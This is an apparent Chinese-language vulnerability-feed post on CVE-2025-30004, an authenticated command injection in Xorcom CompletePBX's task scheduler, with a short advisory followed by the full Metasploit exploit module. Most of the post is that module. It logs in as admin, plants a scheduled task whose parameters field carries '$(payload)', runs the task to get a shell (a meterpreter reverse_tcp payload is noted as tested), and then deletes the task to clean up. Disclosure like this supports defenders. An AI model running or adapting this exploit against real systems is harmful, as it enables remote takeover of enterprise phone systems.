Xorcom CompletePBX Authenticated Command Injection via Task Scheduler

漏洞信息

漏洞名称： Xorcom CompletePBX Authenticated Command Injection via Task Scheduler

漏洞编号：

CVE： CVE-2025-30004

漏洞类型： 命令执行

漏洞等级： 高危

漏洞描述： Xorcom CompletePBX是一款企业级的PBX（专用交换机）解决方案，广泛用于中小型企业以及大型企业的通信系统中。它提供了丰富的电话功能，包括呼叫转移、会议呼叫、语音邮件等，是企业通信的重要组成部分。该漏洞存在于CompletePBX的任务调度功能中，由于对用户输入的不当过滤，导致攻击者可以通过构造恶意的任务参数执行任意命令。此漏洞的技术根源在于任务调度功能在处理用户提供的参数时，未进行充分的输入验证和过滤，从而允许攻击者注入并执行系统命令。由于此漏洞需要超级管理员（admin）权限才能触发，因此攻击者需要先获取有效的管理员凭证才能利用此漏洞。成功利用此漏洞的攻击者可以在目标系统上执行任意命令，可能导致数据泄露、服务中断或其他恶意操作。尽管需要管理员权限，但由于CompletePBX在企业中的广泛使用，此漏洞仍然构成了严重的安全威胁。

产品厂商： Xorcom

产品名称： CompletePBX

影响版本： <= 5.2.35

来源： https://github.com/rapid7/metasploit-framework/blob/837363493262e4490ea7c723fd612eb26a8201fa/modules%2Fexploits%2Flinux%2Fhttp%2Fxorcom_completepbx_scheduler.rb

类型： rapid7/metasploit-framework:github issues

POC详情


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Xorcom CompletePBX Authenticated Command Injection via Task Scheduler',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerability in Xorcom CompletePBX
          versions <= 5.2.35. The issue resides in the task scheduler functionality, where user-controlled
          input is improperly sanitized, allowing arbitrary command execution with web server privileges.

          Only the superadmin user (admin) has the necessary permissions to trigger this exploit.
          Even when creating a new user with maximum privileges, the vulnerability does not work.
        },
        'Author' => [
          'Valentin Lobstein' # Research and module development
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-30004'],
          ['URL', 'https://www.xorcom.com/products/completepbx/'],
          ['URL', 'https://chocapikk.com/posts/2025/completepbx/']
        ],
        'Privileged' => false,
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-03-02',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('USERNAME', [true, 'Valid CompletePBX username']),
      OptString.new('PASSWORD', [true, 'Valid CompletePBX password']),
    ])
  end

  def check
    print_status('Checking if the target is running CompletePBX...')

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    return Exploit::CheckCode::Unknown('No response from target.') unless res
    return Exploit::CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    doc = res.get_html_document

    if doc.at('//meta[@name="description"][@content="CompletePBX"]') ||
       doc.at('//meta[@name="application-name"][@content="Ombutel"]')

      print_good("Detected CompletePBX on #{peer}")
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe('Target does not appear to be running CompletePBX.')
  end

  def login
    print_status("Attempting authentication with username: #{datastore['USERNAME']}")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        'userid' => datastore['USERNAME'],
        'userpass' => datastore['PASSWORD']
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'No response from target')
    end

    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}")
    end

    sid_cookie = res.get_cookies.scan(/sid=[a-f0-9]+/).first

    unless sid_cookie
      fail_with(Failure::NoAccess, 'Authentication failed: No session ID received')
    end

    print_good("Authentication successful! Session ID: #{sid_cookie}")
    return sid_cookie
  end

  def get_latest_task_id(sid_cookie, task_desc)
    print_status("Retrieving latest task ID for description: #{task_desc}...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET',
      'vars_get' => {
        'class' => 'scheduler',
        'method' => 'tasks',
        'offset' => '0',
        'max' => '20',
        'search' => ''
      },
      'cookie' => sid_cookie
    })

    unless res
      fail_with(Failure::Unreachable, 'No response from target while fetching tasks')
    end

    json_res = res.get_json_document
    tasks = json_res['rows']

    unless tasks
      fail_with(Failure::UnexpectedReply, 'Failed to retrieve task list')
    end

    tasks.each do |task|
      if task[2] == task_desc
        print_good("Found task with ID: #{task[0]}")
        return task[0]
      end
    end

    fail_with(Failure::NotFound, "Could not find the task with description: #{task_desc}")
  end

  def create_task(sid_cookie)
    task_desc = Faker::Lorem.sentence(word_count: 4)
    notes = Faker::Lorem.paragraph(sentence_count: 3)
    print_status("Creating malicious scheduled task with description: #{task_desc}")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'cookie' => sid_cookie,
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        'script' => 'backup',
        'description' => task_desc,
        'starting' => Time.now.strftime('%Y-%m-%d %H:%M'),
        'interval' => '1',
        'interval_unit' => 'month',
        'parameters' => "$(#{payload.encoded})",
        'notes' => notes,
        'data' => '0',
        'class' => 'scheduler',
        'method' => 'save_task',
        'mode' => 'create'
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'No response from target while creating task')
    end

    json_res = res.get_json_document
    state = json_res['state']

    if state == 'success'
      print_good('Malicious task successfully created.')
      return task_desc
    else
      fail_with(Failure::UnexpectedReply, 'Failed to create the malicious task')
    end
  end

  def run_task(sid_cookie, task_id)
    print_status("Executing malicious task ID #{task_id}...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'cookie' => sid_cookie,
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        'class' => 'scheduler',
        'method' => 'run_task',
        'mode' => 'run',
        'data' => task_id.to_s
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'No response from target while executing task')
    end

    print_good('Task executed successfully!')
  end

  def delete_task(sid_cookie, task_id)
    %w[delete deleteConfirmed].each do |mode|
      print_status("Sending delete request (mode=#{mode}) for task ID #{task_id}...")

      send_request_cgi({
        'uri' => normalize_uri(target_uri.path),
        'method' => 'POST',
        'cookie' => sid_cookie,
        'ctype' => 'application/x-www-form-urlencoded',
        'vars_post' => {
          'class' => 'scheduler',
          'method' => 'delete_task',
          'mode' => mode,
          'data' => task_id.to_s
        }
      })
    end

    print_good("Task #{task_id} deleted successfully!")
  end

  def exploit
    sid_cookie = login
    task_desc = create_task(sid_cookie)
    task_id = get_latest_task_id(sid_cookie, task_desc)
    run_task(sid_cookie, task_id)
    delete_task(sid_cookie, task_id)
  end
end

Github Poc

#rapid7/metasploit-framework:github issues #命令执行

Xorcom CompletePBX Authenticated Command Injection via Task Scheduler

http://example.com/2025/07/14/github_1698775966/

作者

lianccc

发布于

2025年7月14日

许可协议

HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder Unauthenticated Arbitrary File Upload Vulnerability 上一篇

AIOHTTP is vulnerable to HTTP Request/Response Smuggling through incorrect parsing of chunked trailer sections 下一篇